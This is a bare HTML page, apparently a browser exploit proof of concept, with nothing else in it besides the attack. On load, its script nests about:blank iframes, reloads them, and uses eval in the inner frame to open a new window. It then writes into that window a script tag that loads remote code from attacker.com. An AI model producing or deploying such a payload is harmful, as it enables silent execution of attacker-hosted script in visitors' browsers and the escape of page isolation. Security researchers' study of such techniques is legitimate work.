<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
<iframe id="GGGGGZjkroGGGGG" src="about:blank"></iframe>
<script>
window.onload = function() {
    GGGGGZjkroGGGGG.onload=_=>GGGGGZjkroGGGGG.contentDocument.body.innerHTML+="<iframe id=GGGGZjkroGGGG src=about:blank><\/iframe><script>GGGGZjkroGGGG.onload=_=>GGGGZjkroGGGG.contentWindow.eval('w=window.open(`about:blank`); w.document.write(`<script src=https://attacker.com/static/static.js><\\/script>`);');GGGGZjkroGGGG.contentWindow.location.reload();<\/script>";GGGGGZjkroGGGGG.contentWindow.location.reload();
};
</script>
</body>
</html>